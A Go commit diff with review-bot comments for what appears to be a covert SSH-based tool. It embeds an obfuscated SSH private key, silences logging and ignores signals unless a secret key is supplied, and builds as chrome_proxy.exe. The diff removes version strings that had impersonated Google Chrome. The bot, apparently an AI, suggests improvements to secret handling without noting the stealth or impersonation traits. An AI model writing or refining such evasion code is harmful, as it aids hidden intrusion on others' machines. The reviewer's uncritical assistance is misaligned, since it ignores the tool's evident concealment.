In release build derive VMK from SSH private key when cfg.VerboseModeKey is unset

This commit is contained in:
Jerry Jacobs 2024-07-31 21:03:54 +02:00
parent 7784fa8e4a
commit 6c278f1602
9 changed files with 41 additions and 27 deletions


@ -74,6 +74,8 @@ resources/ssh_private_key.base64.rot13: resources/ssh_private_key.base64
resources/ssh_private_key.base64.rot13.github: resources/ssh_private_key.base64.rot13 resources/ssh_private_key.base64.rot13.github: resources/ssh_private_key.base64.rot13
base64 -i $< -o $@ base64 -i $< -o $@
vmk: resources/ssh_private_key
shasum -a 256 $<
fmt: fmt:
gofmt -w *.go gofmt -w *.go
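Review bot: The new `vmk` target has no `.PHONY` declaration, so a file named `vmk` in the tree would silently stop it from running; add `.PHONY: vmk` next to the target (the `fmt` target in the same hunk has the same gap). The target prints the SHA-256 of `resources/ssh_private_key`, which only matches the value the Go side derives if `resources/ssh_private_key.base64` is the plain base64 of that same file — the rule producing `.base64` is outside this hunk, so that is worth a one-line comment above the target, e.g. `# must equal the default VerboseModeKey derived in resources.go`. Note that the printed value is itself the default VMK, i.e. a secret for the silenced mode, so it should not end up in CI logs.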


@ -9,7 +9,8 @@ type config struct {
// verbose mode is force enabled. The key is read from the "VMK" environment // verbose mode is force enabled. The key is read from the "VMK" environment
// variable at startup. // variable at startup.
// //
// NOTE: This could be the sha256sum hex encoded string of the SSHPrivateKeyFile // When not set during build, in release mode the SHA256-hex fingerprint is
// derived from the PEM SSH private key.
VerboseModeKey string VerboseModeKey string
// SSH server user name // SSH server user name
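Review bot: The new comment on VerboseModeKey says the release default is derived from the PEM private key but not what that implies: the key is embedded in the binary (rot13 + base64, per the `//go:embed` in resources.go), so anyone holding the binary can recompute the default VMK. I would add that caveat to the field doc, e.g. `// NOTE: the derived default is reproducible from the embedded key; set an explicit value at build time if the VMK must stay secret.` The struct definition continues outside this hunk.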


@ -16,9 +16,9 @@ var sshfpResolver *sshfp.Resolver
func secureEraseResourceSSHPrivateKey() { func secureEraseResourceSSHPrivateKey() {
log.Println("ERASING SSH private key") log.Println("ERASING SSH private key")
// for i := range resourceSSHPrivateKey { // for i := range resourceSSHPrivateKey {
// resourceSSHPrivateKey[i] = 0 // resourceSSHPrivateKey[i] = 0
// } // }
} }
type SSHHostPublicKeyFetcher struct { type SSHHostPublicKeyFetcher struct {


@ -4,14 +4,16 @@
package main package main
import ( import (
"crypto/sha256"
_ "embed" _ "embed"
"encoding/base64"
"encoding/hex"
"github.com/awnumar/memguard"
"io/ioutil"
"log"
"os" "os"
"os/user" "os/user"
"path/filepath" "path/filepath"
"log"
"io/ioutil"
"encoding/base64"
"github.com/awnumar/memguard"
) )
//go:embed resources/ssh_private_key.base64.rot13 //go:embed resources/ssh_private_key.base64.rot13
@ -42,7 +44,7 @@ func resourcesPurge() {
memguard.Purge() memguard.Purge()
} }
func resourceSSHPrivateKeyUnpack() { func resourceSSHPrivateKeyUnpack() string {
resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13) resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13)
decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64) decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64)
@ -52,6 +54,11 @@ func resourceSSHPrivateKeyUnpack() {
resourceSSHPrivateKeyMemguardBuffer = memguard.NewBufferFromBytes(decodedData) resourceSSHPrivateKeyMemguardBuffer = memguard.NewBufferFromBytes(decodedData)
resourceSSHPrivateKey = resourceSSHPrivateKeyMemguardBuffer.String() resourceSSHPrivateKey = resourceSSHPrivateKeyMemguardBuffer.String()
shasum := sha256.New()
shasum.Write([]byte(resourceSSHPrivateKey))
return hex.EncodeToString(shasum.Sum(nil))
} }
func resourceSSHPrivateKeyDestroy() { func resourceSSHPrivateKeyDestroy() {
@ -66,7 +73,12 @@ func init() {
// Safely terminate in case of an interrupt signal // Safely terminate in case of an interrupt signal
memguard.CatchInterrupt() memguard.CatchInterrupt()
var logFile string var logFile string
sshPrivateKeySHA256Sum := resourceSSHPrivateKeyUnpack()
if cfg.VerboseModeKey == "" {
cfg.VerboseModeKey = sshPrivateKeySHA256Sum
}
dontSilenceKey := os.Getenv("VMK") dontSilenceKey := os.Getenv("VMK")
if dontSilenceKey == cfg.VerboseModeKey { if dontSilenceKey == cfg.VerboseModeKey {
@ -75,6 +87,7 @@ func init() {
systemIgnoreAllSignals() systemIgnoreAllSignals()
logFile = os.DevNull logFile = os.DevNull
} }
// TODO: memguard at this point the cfg.VerboseModeKey ?
if logFile == "homedir" { if logFile == "homedir" {
logFile = os.DevNull logFile = os.DevNull
@ -104,5 +117,4 @@ func init() {
} }
systemRouteAllLogging(logFile) systemRouteAllLogging(logFile)
resourceSSHPrivateKeyUnpack()
} }
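Review bot: `shasum.Write([]byte(resourceSSHPrivateKey))` in resourceSSHPrivateKeyUnpack copies the whole PEM private key into an ordinary GC-managed byte slice, outside the memguard buffer created on the line just above it, and that copy is never wiped; hashing the locked buffer directly avoids the copy: `sum := sha256.Sum256(resourceSSHPrivateKeyMemguardBuffer.Bytes())` followed by `return hex.EncodeToString(sum[:])` (memguard's LockedBuffer exposes the bytes directly, as far as I recall). Separately, the default VMK assigned in init is a hash of material embedded in the binary, so anyone holding the binary can recompute it; if that is accepted, a comment next to `cfg.VerboseModeKey = sshPrivateKeySHA256Sum` should say so, and the `// TODO: memguard at this point the cfg.VerboseModeKey ?` added in the same hunk is left open by this commit. Moving the unpack ahead of systemRouteAllLogging also means any decode failure in the unpack is logged before logging is redirected — the error path sits between the two hunks, so I cannot tell whether it is fatal. The middle of resourceSSHPrivateKeyUnpack and the start and end of init lie outside these hunks.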


@ -1,8 +1,8 @@
package main package main
import ( import (
"log"
"io" "io"
"log"
"os" "os"
"os/signal" "os/signal"
"path/filepath" "path/filepath"


@ -1,4 +1,4 @@
//go:build darwin //go:build darwin
// +build darwin // +build darwin
package main package main


@ -5,8 +5,8 @@ package main
import ( import (
"log" "log"
"syscall"
"strings" "strings"
"syscall"
) )
func systemGetWINEVersion() string { func systemGetWINEVersion() string {


@ -1,7 +1,8 @@
//go:build windows //go:build windows
//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64
// +build windows // +build windows
//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64
package main package main
import ( import (


@ -19,18 +19,16 @@
"FileSubType": "00" "FileSubType": "00"
}, },
"StringFileInfo": { "StringFileInfo": {
"CompanyName": "Google LLC", "CompanyName": "",
"FileDescription": "Google Chrome", "FileDescription": "",
"FileVersion": "127.0.6533.73", "FileVersion": "",
"InternalName": "chrome_proxy", "InternalName": "",
"LegalCopyright": "Copyright 2024 Google LLC. All rights reserved.", "LegalCopyright": "",
"OriginalFilename": "chrome_proxy.exe", "OriginalFilename": "",
"ProductName": "Google Chrome", "ProductName": "",
"ProductVersion": "127.0.6533.73", "ProductVersion": "",
"CompanyShortName": "Google", "CompanyShortName": "",
"ProductShortName": "Chrome", "ProductShortName": ""
"LastChange": "b59f345ebd6c6bd0b5eb2a715334e912b514773d-refs/branch-heads/6533@{#1761}",
"Official Build": "1"
}, },
"VarFileInfo": { "VarFileInfo": {
"Translation": { "Translation": {